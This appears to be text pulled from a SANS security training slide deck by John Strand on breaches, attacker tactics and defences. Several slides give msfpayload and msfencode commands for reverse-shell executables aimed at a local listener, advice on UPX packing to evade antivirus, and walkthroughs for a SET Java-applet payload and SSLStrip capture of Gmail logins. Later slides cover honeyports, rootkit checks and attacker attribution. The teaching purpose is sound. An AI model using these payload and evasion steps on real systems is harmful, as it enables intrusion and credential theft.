John Strand
SANS
Black Hills Information Security

• The attackers have a clear advantage on us o o o o
They don't play by any rules
We do...
They have a well defined structure for learning
Little to no attribution
• Many think that compliance equals security o o o
This is not true
Compliance with regulations is a guideline
They are a series of objectives
• Many times we don't have time to "know" our networks and systems

• Devastating worm that infected over 15 million computers
• Infection through MS08-067, file shares and removable media o
Microsoft disabled autorun in response to this worm
• Highly effective defenses o o o
Tries to kill AV every second
Blocks certain DNS lookups
Disables Auto update
Disables Safe-mode o
• Updates itself
• Uses crypto

• 100 Million accounts compromised
• Shut down their network for 23 days
• $171 million in lost revenue and costs
• By the way, there were multiple Sony hacks this quarter
• Cross analysis between 1 million Sony passwords and 250K
Gawker passwords revealed that many people reuse passwords
– http://www.theregister.co.uk/2011/06/08/password_re_use_sur vey/
• Also, many people use password complexity exactly like we have trained them
– And it still does not work

• “Hundreds” of accounts compromised
– But in this case size does not matter
• The accounts we targeted “high value” targets
• The attack was launched by an insider
• Overly elaborate attack
– Ordered new checks, forwarded phone calls and arranged for the check pickup
– The attackers were unaware of automatic bill-pay...?
• 10 million dollars stolen
• How do we defend against an insider?

• About the RSA attack..
– It might be worse than we thought, and we thought it was bad
• Attacks against LMCO, L-3 and possibly Northrup Grumman
• SecureID’s generate a “random” pin every 60 seconds
• This pin is based on a random seed file that is shared byt the server and to token
• If you obtain the seed file from the server (.ASC or .XML) you can clone the pin on the fob
• What if RSA was storing PINs for its customers?
• What if those PINS were compromised
• Unfortunately, we don’t know a whole lot

Hi John,
Company X is asked every day if Product X could have stopped the latest du jour threat that is bypassing traditional blacklistingbased antivirus.
On June 26th, 2010, we showed how Product X beat down
Stuxnet. On August 26th, Product X beat down DLL Hijacking attempts. The threats keep coming, so which ones should we beat down next?

• USB… Yep, plain old USB
• The easiest way to bypass the firewall, IDS and IPS
• There were a number of 0-days
– .lnk file vulnerability
– Print Spooler (CVE-2010-2729)
– Win32 Keyboard Layout Vulnerability
– Privilege escalation via Task Schedule
• There has been some misinformation about the Task
Scheduler vulnerability from some AV vendors
– You do not need to be in the local administrators group
• It also used some older exploits like 08-067
– Conficker anyone?

• Remember the Windows baseline section of 464?
– tasklist /m
– tasklist /m s7otbxdx.dll
• Stuxnet used dll replacement to insert execution redirection
• In fact, it moved s7otbxdx.dll to s7otbxsx.dll inserted its own s7otbxdx.dll
– This is important because it means the attackers had an understanding of the original code
– 93 of the original 109 exports are forwarded to the renamed s7otbxsx.dll
– The remaining 16 get us excited

• Once it infects a system it tries to connect to two sites to verify connectivity:
– www.mypremierfutbol.com
– www.todaysfutbol.com
– Clearly not targeting a US audience….
• P2P Communication
• C2 servers in Malaysia and Denmark
– Checking Versions
• It also uses peer-to-peer communication
• Remember what we covered in the network lab?
– Yeah, it tried to spread via shares
– Watch that system-to-system communication
• Watch for PLC systems connecting to the Internet

• I had to look it up
– I hear about it a lot, but I don’t have a clear concept of what it is
• Straight to the Wiki!
– “Cloud computing is Internet-based computing, whereby shared resources, software and information are provided to computers and other devices on-demand, like a public utility.”
• I get it… It is like a Bot-Net!
• Based on Vendor Information it looks like it is going to make me irrelevant

• “It is a paradigm shift..” Oh oh… This is going to be good
.
• It is a paradigm shift following the mainframe and client-server shifts that preceded it.
Details are abstracted from the users who no longer have need of, expertise in, or control over the technology infrastructure
"in the cloud" that supports them.
[1
] Cloud computing describes a new supplement, consumption and delivery model for IT services based on the Internet
, and it typically involves the provision of dynamically scalable and often virtualized resources as a service over the Internet.
[2][3
] remote computing sites provided by the Internet.
[4]
It is a byproduct and consequence of the ease-of-access to
• The term cloud is used as a metaphor for the Internet
, based on the cloud drawing used in the past to represent the telephone network [5] , and later to depict the
Internet in computer network diagrams as an abstraction of the underlying infrastructure it represents.
[6] Typical cloud computing providers deliver common business applications online which are accessed from a web browser, while the software and data are stored on servers.

• Security could improve due to centralization of data [35] , increased security-focused resources, etc., but concerns can persist about loss of control over certain sensitive data, and the lack of security for stored kernels [36] .
Security is often as good as or better than under traditional systems, in part because providers are able to devote resources to solving security issues that many customers cannot afford.
[37] Providers typically log accesses, but accessing the audit logs themselves can be difficult or impossible. Furthermore, the complexity of security is greatly increased when data is distributed over a wider area and / or number of devices.

• “The term
Internet.” cloud is used as a metaphor for the
• But the Internet is Evil!!
– How can this be so?

• We have to know who it is we are working with
• Who are the people we are defending?
• Who is attacking?
– What are their capabilities?
– What are their means?
• What are the tools we have to defend ourselves?
• Who is on our side?

• They are trying to go places they shouldn’t
• Security is not a major concern
– They never get into trouble
• “It was just a pop-up!”
– They “think” they know what it would look like if they were attacked.
• No skull and crossbones? Good to go!
• You “think” they are “stupid”
• Are they?

• Loves to gamble
• Likes Polka Dots
• Likes anything with “Polka” in it
• Thinks the CD tray is a coaster
• Collects Gnomes
• Bypasses your outbound web filters buy using a third party anonymizing proxy

• Works with numbers…
• ... and Terabytes of
Porn!
• Has a “slight” problem
• Does not get along with Granny Max
• Hates cats
• Bypasses your filtering by using a SSH tunnel through his home system

• Do not gamble…
– … at work
• Do not surf porn…
– ….at work
• Likes: Facebook, YouTube,
Politics, eBay, Googling,
Fantasy football, Fark,
Drudge Report, the
Huffington Post, CNN,
Amazon
• Dislikes: Web filters
• Quickly becoming friends with Phil and Gran Max to learn ways to bypass your filtering

The Bobs
• Motivated
– Can you imagine
HR department?
their
• Wicked skilled (more on this later)
• They either own or infect many of the sites your more “interesting” users are going to

• The Internet is big…
• … really big
• You just won't believe how vastly hugely mindboggingly big it is...
• Most of it is worthless.. and Evil!
• Many of your users will not stop clicking until they visit every site

• "But Anti-Virus software will protect us... Right?"
• Anti-Virus, like all software, has its limitations
• Do not believe for one second that it is the ultimate protection
• It works great for detecting and removing known malware
• That means someone was infected before you
• Many dedicated and targeted attackers are not concerned about anti virus software
• But why?

– There are a variety of ways
– But remember the goal is to create a "new" signature
– Attackers can use packers to "pack" the malicious code
• This creates a self-extracting and executing file
• In the process of packing the executable is scrambled
• Functions may not be where AV expects them to be
– Attackers can also use tools to "encode" the executable
• This has been around for a long time in tools like ADMutate and
PEScramble
• One technique these tools use is to add a large number of "jumps" to the code making it difficult to reverse

• Let's say an attacker wanted to create an executable that created a reverse connecting, memory based rootkit
• Straight msfpayload to an exe
• ./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.1 LPORT=8081 X >
PlainMetrev_8081.exe

• Attackers can use compression as a means to bypass
AV products
• One product that attackers often use is the Ultimate
Packer and Unpacker for Executables (UPX)
• upx -2 -f -o PlainMetRevUPX.exe PlainMetRev.exe
o o o o
This will create an executable that is compressed with a setting of 2
The settings go from 1 to 9
The higher the level the greater the compression
2 works very well for bypassing AV

• ./msfpayload windows/shell/reverse_http
LHOST=192.168.1.1 LPORT=9091 X >
PlainShellRevHttp_8081.exe
• This is slightly different than the previous example
• This is a shell that makes a reverse HTTP connection

• ./msfpayload windows/shell/reverse_http
LHOST=192.168.1.1 LPORT=8080 R | ./msfencode -b '' " t exe -o EncShellRevHttp.exe
• We are now using encoding on the executable
• This means the executable will be different every time it is created
• The default encoder with the Metasploit framework is
" Shikata ga nai"
• This means "There is nothing that can be done about it" in Japanese

• There are a variety of ways to bypass AV
• But what about IDS?
• Turns out many IDS products have the same
"signature-based" problem
• Some claim to be "heuristic"
• We can fragment our attacks o
Separate the attack across multiple packets
• We can encode the attacks o o
Into Base 64
Unicode o
Hex

– Why not have the victim system connect to us!
• We bypass many firewall and IDS/IPS restrictions
• We can make it look like standard web traffic
– We could have our attacks go over Secure Sockets
Layer
• Many organizations are using SSL to protect their traffic in transit
• However, it often blinds them to attacks against their web servers
• Attackers can try Cross Site Scripting, SQL Injection and Command injection all day long
– Remember just because there is a lock it does not mean it is "secure"

• One of the easiest ways for an attacker to hide or even attack your systems is to "blend-in"
• Many people think that an attacker will only use exploits to
"spread" through your network o
This is not true
• Rather, they will utilize built-in services and commands to compromise additional systems o
SSH or RDP with accounts and passwords from the first system compromised
• This will not be caught by your IDS because it is "normal" traffic

• Java is an excellent payload option
– Installed pretty much everywhere
Its what's for breakfast.
– Users are accustomed to clicking “ Run ” for Java apps
• SET has the ability to take a Metasploit payload and export it to a .jar file
• In this example we will be taking the default SET web page and inserting a .jar file into it
• When a user connects to our site the java app will load
• Shell will ensue

Nice ASCII Art!

Hack By
Numbers!
Please select Option Number 2

The Option We
Will Be Using
Very Effective
If You Know
HTML
Import your own website is even more effective if you are not particularly good at HTML

Can be flaky

Please Select Option 1 for 32 Bit
Or, 6 for Windows 64 Bit Systems
• Meterpreter and VNC payloads are nice
- However, they can be unstable
• Shell Reverse_TCP tends to be the most stable in testing
• Knowing if your target is running 64 bit can be a big help

We Are Going to Use shikata_ga_nai
We Will Encode Twice

Please Choose “ no ”
Metasploit Starting

Because Cows are Cool
Reverse Payload
Listening on 4444

http://[Your Linux IP]
Everyone Clicks “ Run ”

Interacting with Our
Shell
• Yes!!!
• Now you can wield your Windows Command-line
Kung-fu!
Time to do the “ Happy
Dance ”

• Modular exploit tool to spoof Software Update Responses
– "Yes, there IS an update available!"
• Delivers executable of your choosing to the victim
• Includes support for multiple vulnerable updaters
– JRE, WinZip, WinAmp, OpenOffice, iTunes, Notepad++ and more
• Relies on MITM from third-party attack
– LAN and Ettercap, or remote with DNS manipulation
• Perl-based console interface similar to Cisco IOS
– Output and navigation slightly messy

• Let’s say you disabled Autorun on all your systems
• Further, let’s say you disable USB mass storage devices
• You can still be compromised by a tin of Altoids
• Enter Programmable HID USB Keystroke Dongle
• The latest attack vector from IronGeek
• He is now trying to find fixes
• Implemented S.E.T
• Upload any Metasploit Payload

• “But we do not have wireless in our network!”
– Are you sure?
• One access point can bypass all of your external controls
• “Free Wireless Internet” anyone?
• Attackers do not need to find an access point
– They just need to find a client
– Karmetasploit is evil
• This also goes for your phone
– Do you use GSM?
– http://www.shmoocon.org/presentations-all.html#srsly

• By Paterva
• Focus is on “extreme” reconnaissance
• GUI based display
– I know… I know.. But the GUI rocks
• We can pull
– Personal Information
– Sites
– Additional Email addresses
– Friends?
– Family?
– Intrests

Step 1:
Click Email
Address
Step 2:
Click Here
Step 3: Fill In Email

Right click
And Select
All Transforms

Click Yes

Linkedin
A friend

• There are a number of different ways to hijack SSL
– See WebMTIM from dsniff
• Unfortunately the user will receive “negative feedback”
– Just another way of saying they get a pop-up box
• Most users will click through
– The paranoid ones will not
• So how do you hijack the overly paranoid user?

• Another great tool from Moxie Marlinspike
• This tool strips away SSL from the end user
– Hence the name
• The HTTPS will become HTTP
– No negative feedback to the user
• The vast number of users will not notice
– Even the very paranoid ones
• The 300
• We need to use a tool like dsniff to hijack the traffic and a tool like iptables to redirect the traffic to where sslstrip is waiting

Get your targets IP and Gateway

• Now Surf to http://gmail.com
and try to log in!
You should see some activity in SSLStrip!!

Looks like we got some data!!!

Paydirt!!!

• Baseline your systems
– Processes, DLL’s for Core applications, Users, etc.
• Baseline your network traffic
– Why would you allow PLC systems to connect to the Internet?
• Monitor those baselines
– If at all possible, do this hourly
• Don’t use shady Russian contractors with compromised websites
• Train everyone, because everyone is a target
– Secure the human
• Yes, even you
– Sounds paranoid, I know

• There are a number of Autostart entry points on your
Windows systems
• Run
• RunOnce
• RunOnceEx
• There are a lot more of these than we can cover in a few slides
– Useruinit
– Boot.ini
• There needs to be a better way to look at what is going to automatically start on our Windows computers

• Rather than look for specific malware we can also look for indications of compromise
• Rootkit Hunter and chkrootkit do this
• They also look for a few specific binaries
• Very easy to set up and use
• Looks for
– Certain hashes
– Wrong File permissions
– Hidden Files
– Orphaned files
• Why use both tools?

• Sometimes the best way to know you are compromised is to check your DNS cache
• Not 100%, but nothing is
• This script queries your DNS server and sees if there are any DNS entries that are for “bad” sites
• It can automatically pull down a blacklist and do a compare
• However, you can provide your own blacklist
• Best used daily (think Nagios)
• http://www.mayhemiclabs.com/tools/malwarednsscraper

Bad
Good

• When discussing security we need to be of two separate minds
– Offensive
– Defensive
• A little lesson on OODA loops
– Observe
– Orient
– Decide
– Act
• In our current defensive postures how can we do this

• @echo offfor /L %%i in (1,1,1) do @for /f "tokens=3"
%%j in ('netstat -nao ^| find ^":3333^"') do@for /f
"tokens=1 delims=:" %%k in ("%%j") do netsh advfirewall firewall add rulename="WTF" dir=in remoteip=%%k localport=any protocol=TCP action=block
• Easy copy and paste link from:
– http://pauldotcom.com/wiki/index.php/Episode203

• [root@linux ~]# while [ 1 ] ; echo "started" ; do IP=`nc
-v -l -p 2222 2>&1 1> /dev/null | grep from | cut -d[ -f 3
| cut -d] -f 1`; iptables -A INPUT -p tcp -s ${IP} -j DROP
; done
• Easy copy and paste link from:
– http://pauldotcom.com/wiki/index.php/Episode204

• Does the same thing we covered in the Blacklisting section
• However, it does offer more flexibility
– Logging
– Rerouting traffic
– Blocking through hosts.deny
• A bit of an older tool (2003) but still surprisingly effective
• Set it up before an audit or a penetration test and make your Linux/Unix systems “go away”
• Still requires a listener (nc) on a honeyport.

• Very easy to use
• Supposed to be used for penetration testing
• However this tactic works great at tracking intellectual property
• Not all ways of finding attribution need to result in shell access
• Far less likely to crash a system
• Embed this code in a spreadsheet called SSN.xls and watch how fast an attacker runs the macros

• It simply inserts a reference to a css or image to a web server
• When the doc is opened it tries to open the URL
• Direct connection!

• Hunting back where the attackers are coming from
• This is done by having the victim/attacker connect back using a number of applications
– Java
– iTunes
– Word
– FTP
– Quicktime
– DNS
• By having them connect in a number of different ways with different applications we increase the odds of finding their
“real” IP address

• You can use their servers
– Generate a MD5 string based on the attacker/victims information
– Embed an iframe directing them to the decloak site
– Recover the information gathered from decloak.net
• You can also implement their API’s on your servers
– Implement a custom DNS server
– Create a Database for the results
– Embed the the Java and Flash applications from decloak.net

• http://www.sans.org/rocky-mountain-2011/
• SANS Security Essentials Bootcamp Style
• Management 414: SANS +S™ Training Program for the
CISSP® Certification Exam
– ISACA10 = 10% off
• Management 512: SANS Security Leadership Essentials For
Managers
• Security 504: Hacker Techniques, Exploits & Incident Handling
• Security 505: Securing Windows
• Developer 522: Defending Web Applications Security
Essentials
• Forensics 558: Network Forensics

• Strandjs = twitter
• www.blackhillsinfosec.com
• www.pauldotcom.com
• 303-710-1171
• 605-550-0724